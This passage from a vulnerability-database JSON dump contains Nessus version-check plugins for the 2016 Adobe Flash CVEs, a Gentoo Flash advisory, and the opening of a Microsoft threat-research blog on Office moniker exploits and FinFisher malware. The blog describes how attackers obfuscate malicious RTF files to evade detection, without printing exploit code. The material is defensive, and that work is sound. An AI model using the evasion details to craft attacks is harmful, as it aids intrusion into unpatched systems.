(CVE-2016-1097, CVE-2016-1106,\n CVE-2016-1107, CVE-2016-1108, CVE-2016-1109,\n CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, \n CVE-2016-4121)\n\n - A heap buffer overflow condition exists in the bundled\n version of Adobe Flash that allows an attacker to\n execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists in the bundled\n version of Adobe Flash that allows an attacker to\n execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist in the bundled\n version of Adobe Flash that allow an attacker to execute\n arbitrary code. (CVE-2016-1096, CVE-2016-1098,\n CVE-2016-1099, CVE-2016-1100, CVE-2016-1102,\n CVE-2016-1104, CVE-2016-4109, CVE-2016-4111,\n CVE-2016-4112, CVE-2016-4113, CVE-2016-4114,\n CVE-2016-4115, CVE-2016-4120, CVE-2016-4160,\n CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n\n - A flaw exists in the bundled version of Adobe Flash when\n loading dynamic-link libraries. An attacker can exploit\n this, via a specially crafted .dll file, to execute\n arbitrary code. 
(CVE-2016-4116)\");\n # http://googlechromereleases.blogspot.com/2016/05/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ddef1fa8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 50.0.2661.102 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4117\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'50.0.2661.102', severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:11:11", "description": "This update for flash-player fixes the following issues :\n\n - Security update to 11.2.202.621 (bsc#979422) :\n\n - APSA16-02, APSB16-15, CVE-2016-1096, CVE-2016-1097, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1101, CVE-2016-1102, CVE-2016-1103, CVE-2016-1104, CVE-2016-1105, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4109, CVE-2016-4110, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4116, CVE-2016-4117\n\n - The following CVEs got fixed during the previous release, but got published afterwards :\n\n - APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-18T00:00:00", "type": "nessus", "title": "SUSE SLED12 Security Update : flash-player (SUSE-SU-2016:1305-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033", "CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:flash-player", "p-cpe:/a:novell:suse_linux:flash-player-gnome", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-1305-1.NASL", "href": "https://www.tenable.com/plugins/nessus/91217", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1305-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91217);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1006\",\n 
\"CVE-2016-1011\",\n \"CVE-2016-1012\",\n \"CVE-2016-1013\",\n \"CVE-2016-1014\",\n \"CVE-2016-1015\",\n \"CVE-2016-1016\",\n \"CVE-2016-1017\",\n \"CVE-2016-1018\",\n \"CVE-2016-1019\",\n \"CVE-2016-1020\",\n \"CVE-2016-1021\",\n \"CVE-2016-1022\",\n \"CVE-2016-1023\",\n \"CVE-2016-1024\",\n \"CVE-2016-1025\",\n \"CVE-2016-1026\",\n \"CVE-2016-1027\",\n \"CVE-2016-1028\",\n \"CVE-2016-1029\",\n \"CVE-2016-1030\",\n \"CVE-2016-1031\",\n \"CVE-2016-1032\",\n \"CVE-2016-1033\",\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"SUSE SLED12 Security Update : flash-player (SUSE-SU-2016:1305-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for flash-player fixes the following issues :\n\n - Security update to 11.2.202.621 (bsc#979422) :\n\n - APSA16-02, APSB16-15, CVE-2016-1096, CVE-2016-1097,\n CVE-2016-1098, CVE-2016-1099, CVE-2016-1100,\n CVE-2016-1101, CVE-2016-1102, CVE-2016-1103,\n CVE-2016-1104, CVE-2016-1105, CVE-2016-1106,\n CVE-2016-1107, CVE-2016-1108, CVE-2016-1109,\n CVE-2016-1110, CVE-2016-4108, CVE-2016-4109,\n CVE-2016-4110, CVE-2016-4111, CVE-2016-4112,\n CVE-2016-4113, CVE-2016-4114, CVE-2016-4115,\n CVE-2016-4116, CVE-2016-4117\n\n - The following CVEs got fixed during the previous\n release, but got published afterwards :\n\n - 
APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011,\n CVE-2016-1012, CVE-2016-1013, CVE-2016-1014,\n CVE-2016-1015, CVE-2016-1016, CVE-2016-1017,\n CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023,\n CVE-2016-1024, CVE-2016-1025, CVE-2016-1026,\n CVE-2016-1027, CVE-2016-1028, CVE-2016-1029,\n CVE-2016-1030, CVE-2016-1031, CVE-2016-1032,\n CVE-2016-1033\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=979422\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1006/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1011/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1012/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1013/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1014/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1015/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1016/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1017/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1018/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1019/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1020/\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://www.suse.com/security/cve/CVE-2016-1021/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1022/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1023/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1024/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1025/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1026/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1027/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1028/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1029/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1030/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1031/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1032/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1033/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1096/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1097/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1098/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1099/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1100/\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://www.suse.com/security/cve/CVE-2016-1101/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1102/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1103/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1104/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1105/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1106/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1107/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1108/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1109/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1110/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4108/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4109/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4110/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4111/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4112/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4113/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4114/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4115/\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://www.suse.com/security/cve/CVE-2016-4116/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4117/\");\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161305-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e82b824a\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP1 :\n\nzypper in -t patch SUSE-SLE-WE-12-SP1-2016-772=1\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2016-772=1\n\nSUSE Linux Enterprise Desktop 12-SP1 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-772=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2016-772=1\n\nTo bring your system up-to-date, use 'zypper patch'.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/18\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.621-130.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.621-130.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.621-130.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.621-130.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2022-01-17T19:06:33", "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-plugins/adobe-flash-11.2.202.626\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-06-18T00:00:00", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163", "CVE-2016-4171"], "modified": "2016-06-18T00:00:00", "id": "GLSA-201606-08", "href": "https://security.gentoo.org/glsa/201606-08", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2018-01-16T03:40:26", "description": "The Office 365 Threat Research team has seen an uptick in the use of Office exploits in attacks across various industry sectors in recent months. 
In this blog, we will review several of these exploits, including a group of Office moniker exploits that attackers have used in targeted as well as crimeware attacks. We will also describe the payloads associated with these exploits and highlight our research into a particularly sophisticated piece of malware. Finally, we will demonstrate how [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>), [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>), and [Windows Defender Exploit Guard](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware?ocid=cx-blog-mmpc>) protect customers from these exploits.\n\n## Exploit attacks in Fall 2017\n\nThe discovery and public availability of a few Office exploits in the last six months led to these exploits gaining popularity among crimeware and targeted attackers alike. While crimeware attackers stick to payloads like [ransomware](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>) and [info stealers](<https://blogs.technet.microsoft.com/mmpc/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/>) to attain financial gain or information theft, more sophisticated attackers clearly distinguish themselves by using advanced and multi-stage implants.\n\nThe Office 365 Threat Research team has been closely monitoring these attacks. 
The Microsoft Threat Intelligence Center (MSTIC) backs up our threat research with premium threat intelligence services that we use to correlate and track attacks and the threat actors behind them.\n\n### CVE-2017-0199\n\n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>) is a remote code execution (RCE) vulnerability in Microsoft Office that allows a remote attacker to take control of a vulnerable machine if the user chooses to ignore the Protected View warning message. The vulnerability, which is a logic bug in the URL moniker that executes the HTA content using the _htafile_ OLE object, was fixed in the [April 2017 security updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/42b8fa28-9d09-e711-80d9-000d3a32fc99>).\n\n\n\n_Figure 1. CVE-2017-0199 exploit code_\n\nEver since [FireEye blogged](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) about the vulnerability, we have identified numerous attacks using this exploit. The original exploit was used in limited targeted attacks, but soon after, commodity crimeware started picking it up from the publicly available exploit generator toolkits. As shown in Figure 2, the creator and _lastModifiedBy_ attributes help identify the use of such toolkits in generating exploit documents.\n\n\n\n_Figure 2. Exploit kit identifier_\n\nA slight variation of this exploit, this time in the script moniker, was also released. When activated, this exploit can launch [scriptlets](<https://msdn.microsoft.com/en-us/library/office/aa189871\\(v=office.10\\).aspx>) (which consist of HTML code and script) hosted on a remote server. A proof-of-concept (PoC) made publicly available used a Microsoft PowerPoint Slideshow (PPSX) file to activate the script moniker and execute remote code, as shown in Figure 3.\n\n\n\n_Figure 3. 
PPSX activation for script moniker_\n\n### CVE-2017-8570\n\nThe [July 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/f2b16606-4945-e711-80dc-000d3a32fc99>) from Microsoft included a fix for another variation of the CVE-2017-0199 exploit, [CVE-2017-8570](<https://nvd.nist.gov/vuln/detail/CVE-2017-8570>), which was discovered in URL moniker that, similar to HTA files, can launch scriptlets hosted on a remote server. Even though the vulnerability was not exploited as a zero-day, the [public availability](<https://github.com/Ring0Mob/CVE-2017-8570>) of an exploit toolkit created a wave of malicious PPSX attachments.\n\n### CVE-2017-8759\n\nIn September 2017, [FireEye discovered](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) another zero-day exploit used in targeted attacks. The [CVE-2017-8759 exploit](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>) takes advantage of a code injection vulnerability in .NET Framework while parsing a WSDL definition using the SOAP moniker. The vulnerability was fixed in the [September 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/5984735e-f651-e711-80dd-000d3a32fc99>). The original exploit used an HTA file similar to CVE-2017-0199 to execute the attacker code on vulnerable machines. This exploit piqued our interest because it delivered one of the most complex, multiple-VM-layered pieces of malware we have seen, FinFisher, whose techniques we discuss in the following section.\n\nThe CVE-2017-8759 exploit soon got ported to a PPSX file. Figure 4 below shows an example of the exploit.\n\n\n\n_Figure 4. 
CVE-2017-8759 exploit_\n\n### CVE-2017-11826\n\nFinally, on September 28, 2017, [Qihoo 360](<https://360coresec.blogspot.dk/2017/10/new-office-0day-cve-2017-11826.html>) identified an RTF file in targeted attacks that exploited a memory corruption vulnerability in Microsoft Office. The vulnerability exists in the way Office parses objects within nested Office tags and was fixed in the [October 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/313ae481-3088-e711-80e2-000d3a32fc99>). The forced address space layout randomization (ASLR) prevented the exploit from running in Office 2013 and above. Figure 5 shows the nested tags from the original exploit that led to the bug.\n\n\n\n_Figure 5. CVE-2017-11826 exploit_\n\n## Payloads\n\nExcept for the memory corruption exploit CVE-2017-11826, the exploits discussed in this blog pull the malware payload from remote locations at run time, so the document itself carries no payload for antivirus engines and sandboxes to inspect, which could make it difficult to reliably detect these exploits. Additionally, the public availability of scripts that generate exploit templates could make it challenging for incident responders.\n\nAs cited above, these exploits were used in both commodity and targeted attacks. Attackers attempt to bypass AV engine defenses using different obfuscation techniques. Here are some of the obfuscation techniques used in attacks that we recently analyzed:\n\n * Attackers used HLFL as an element type in the malicious RTF attachment. This element is not supported in the official RTF specification but serves as an effective obfuscation against static detections.\n\n\n\n * Similarly, we have seen attackers using ATNREF and MEQARR elements in malicious RTF attachments.\n\n\n\nIn most of the attacks we analyzed, the exploits used PowerShell to download and execute malware payloads, which are usually crimeware samples like ransomware or info stealers.\n\n\n\n_Figure 6. 
PowerShell payload from the HTA file_\n\nHowever, every now and then, we stumble upon an interesting piece of malware that particularly catches our attention. One such malware is Wingbird, also known as FinFisher, which was used in one of the targeted attacks using the CVE-2017-8759 exploit.\n\n### WingBird (also known as FinFisher)\n\n[Wingbird](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Wingbird.A!dha>) is an advanced piece of malware that shares characteristics with government-grade commercial surveillance software, FinFisher. The activity group [NEODYMIUM](<https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/>) is known to use this malware in its attack campaigns.\n\nThe group behind WingBird has proven to be highly capable of using zero-day exploits in its attacks, as mentioned in our [previous blog post on CVE-2017-8759](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>). So far, we have seen the group use the exploits below in campaigns. These are mostly in line with the findings of Kaspersky Labs, which they documented in a [blog](<https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/>):\n\n * CVE-2015-5119 (Adobe Flash)\n * CVE-2016-4117 (Adobe Flash)\n * CVE-2017-8759 (Microsoft Office)\n * CVE-2017-11292 (Adobe Flash)\n\nThe interesting part of this malware is the use of spaghetti code, multiple virtual machines, and lots of 